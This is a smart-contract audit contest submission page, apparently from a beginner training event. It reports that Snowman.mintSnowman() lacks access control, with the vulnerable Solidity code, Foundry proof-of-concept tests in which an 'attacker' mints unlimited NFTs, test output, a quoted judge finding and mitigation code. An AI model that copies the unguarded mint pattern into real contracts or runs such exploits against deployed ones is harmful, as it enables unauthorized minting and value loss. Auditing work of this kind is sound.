Snowman Merkle Airdrop
AI First Flight #10
Beginner FriendlyFoundrySolidityNFT
EXP
View results
Previous Next
Submission Details
Severity: high
Valid

Unrestricted `mintSnowman` allows anyone to mint unlimited Snowman NFTs

cryptobloc

Unrestricted mintSnowman allows anyone to mint unlimited Snowman NFTs

Severity

High

Description

Snowman.mintSnowman() is intended to mint Snowman NFTs for users who stake Snow tokens through the SnowmanAirdrop contract. However, the function is declared external and has no access control.

Affected code:

function mintSnowman(address receiver, uint256 amount) external {
for (uint256 i = 0; i < amount; i++) {
_safeMint(receiver, s_TokenCounter);
emit SnowmanMinted(receiver, s_TokenCounter);
s_TokenCounter++;
}
}

Any address can call this function directly and mint any number of NFTs to any receiver. The caller does not need to own Snow, stake Snow, be included in the Merkle tree, or provide an EIP-712 signature.

Affected file:

  • src/Snowman.sol:36

Risk

This breaks the core airdrop accounting model. Snowman NFTs are supposed to represent rewards for users who stake Snow tokens, but unrestricted minting allows anyone to bypass the staking and Merkle proof flow completely.

Impact:

  • unlimited free NFT minting,

  • complete bypass of SnowmanAirdrop,

  • invalid Snow-to-Snowman reward accounting,

  • dilution or destruction of Snowman NFT supply integrity.

Proof of Concept

The PoC deploys a fresh Snowman contract, creates an arbitrary attacker address, and has that attacker call mintSnowman(receiver, amount) directly. The test does not deploy or use SnowmanAirdrop, does not stake Snow, and does not provide a Merkle proof or signature. The receiver still receives the requested NFTs.

Add this test to test/AuditFuzz.t.sol:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.24;
import {Test} from "forge-std/Test.sol";
import {Snowman} from "../src/Snowman.sol";
contract AuditFuzzTest is Test {
function testFuzz_AnyoneCanMintSnowmanWithoutStaking(uint256 receiverSeed, uint256 amount) public {
address receiver = address(uint160(uint256(keccak256(abi.encode(receiverSeed)))));
vm.assume(receiver != address(0));
vm.assume(receiver.code.length == 0);
amount = bound(amount, 1, 25);
Snowman nft = new Snowman("data:image/svg+xml;base64,");
address attacker = makeAddr("attacker");
vm.prank(attacker);
nft.mintSnowman(receiver, amount);
assertEq(nft.balanceOf(receiver), amount);
assertEq(nft.getTokenCounter(), amount);
}
}

Run:

forge test --match-test testFuzz_AnyoneCanMintSnowmanWithoutStaking --fuzz-runs 10000 -vvv

Result:

[PASS] testFuzz_AnyoneCanMintSnowmanWithoutStaking(uint256,uint256) (runs: 10000)

I also confirmed this with an invariant test, Halmos, and Echidna. The invariant is:

function invariant_OnlyAirdropClaimsCanIncreaseSupply() public view {
assertEq(nft.getTokenCounter(), 0);
}

It fails after one arbitrary call to mintSnowman, proving that non-airdrop callers can increase NFT supply.

Mitigation

Restrict mintSnowman() so only the authorized airdrop contract can call it.

Example fix:

contract Snowman is ERC721, Ownable {
error SM__NotAllowed();
address private immutable i_airdrop;
constructor(string memory _snowmanSvgUri, address _airdrop)
ERC721("Snowman Airdrop", "SNOWMAN")
Ownable(msg.sender)
{
if (_airdrop == address(0)) revert SM__NotAllowed();
i_airdrop = _airdrop;
s_SnowmanSvgUri = _snowmanSvgUri;
}
modifier onlyAirdrop() {
if (msg.sender != i_airdrop) revert SM__NotAllowed();
_;
}
function mintSnowman(address receiver, uint256 amount) external onlyAirdrop {
for (uint256 i = 0; i < amount; i++) {
_safeMint(receiver, s_TokenCounter);
emit SnowmanMinted(receiver, s_TokenCounter);
s_TokenCounter++;
}
}
}

Alternatively, make mintSnowman() onlyOwner and transfer ownership of the NFT contract to the airdrop contract during deployment.

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 4 hours ago
Submission Judgement Published
Validated
Assigned finding tags:

[H-01] Unrestricted NFT Minting in Snowman.sol

# Root + Impact ## Description * The Snowman NFT contract is designed to mint NFTs through a controlled airdrop mechanism where only authorized entities should be able to create new tokens for eligible recipients. * The `mintSnowman()` function lacks any access control mechanisms, allowing any external address to call the function and mint unlimited NFTs to any recipient without authorization, completely bypassing the intended airdrop distribution model. ```Solidity // Root cause in the codebase function mintSnowman(address receiver, uint256 amount) external { @> // NO ACCESS CONTROL - Any address can call this function for (uint256 i = 0; i < amount; i++) { _safeMint(receiver, s_TokenCounter); emit SnowmanMinted(receiver, s_TokenCounter); s_TokenCounter++; } @> // NO VALIDATION - No checks on amount or caller authorization } ``` ## Risk **Likelihood**: * The vulnerability will be exploited as soon as any malicious actor discovers the contract address, since the function is publicly accessible with no restrictions * Automated scanning tools and MEV bots continuously monitor new contract deployments for exploitable functions, making discovery inevitable **Impact**: * Complete destruction of tokenomics through unlimited supply inflation, rendering all legitimate NFTs worthless * Total compromise of the airdrop mechanism, allowing attackers to mint millions of tokens and undermine the project's credibility and economic model ## Proof of Concept ```Solidity // SPDX-License-Identifier: MIT pragma solidity ^0.8.24; import {Test, console2} from "forge-std/Test.sol"; import {Snowman} from "../src/Snowman.sol"; contract SnowmanExploitPoC is Test { Snowman public snowman; address public attacker = makeAddr("attacker"); string constant SVG_URI = "data:image/svg+xml;base64,PHN2Zy4uLi4+"; function setUp() public { snowman = new Snowman(SVG_URI); } function testExploit_UnrestrictedMinting() public { console2.log("=== UNRESTRICTED MINTING EXPLOIT ==="); console2.log("Initial token counter:", snowman.getTokenCounter()); console2.log("Attacker balance before:", snowman.balanceOf(attacker)); // EXPLOIT: Anyone can mint unlimited NFTs vm.prank(attacker); snowman.mintSnowman(attacker, 1000); // Mint 1K NFTs console2.log("Final token counter:", snowman.getTokenCounter()); console2.log("Attacker balance after:", snowman.balanceOf(attacker)); // Verify exploit success assertEq(snowman.balanceOf(attacker), 1000); assertEq(snowman.getTokenCounter(), 1000); console2.log(" EXPLOIT SUCCESSFUL - Minted 1K NFTs without authorization"); } } ``` <br /> PoC Results: ```Solidity forge test --match-test testExploit_UnrestrictedMinting -vv [⠑] Compiling... [⠢] Compiling 1 files with Solc 0.8.29 [⠰] Solc 0.8.29 finished in 1.45s Compiler run successful! Ran 1 test for test/SnowmanExploitPoC.t.sol:SnowmanExploitPoC [PASS] testExploit_UnrestrictedMinting() (gas: 26868041) Logs: === UNRESTRICTED MINTING EXPLOIT === Initial token counter: 0 Attacker balance before: 0 Final token counter: 1000 Attacker balance after: 1000 EXPLOIT SUCCESSFUL - Minted 1K NFTs without authorization Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 4.28ms (3.58ms CPU time) Ran 1 test suite in 10.15ms (4.28ms CPU time): 1 tests passed, 0 failed, 0 skipped (1 total tests) ``` ## Recommended Mitigation Adding the `onlyOwner` modifier restricts the `mintSnowman()` function to only be callable by the contract owner, preventing unauthorized addresses from minting NFTs. ```diff - function mintSnowman(address receiver, uint256 amount) external { + function mintSnowman(address receiver, uint256 amount) external onlyOwner { for (uint256 i = 0; i < amount; i++) { _safeMint(receiver, s_TokenCounter); emit SnowmanMinted(receiver, s_TokenCounter); s_TokenCounter++; } } ```

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!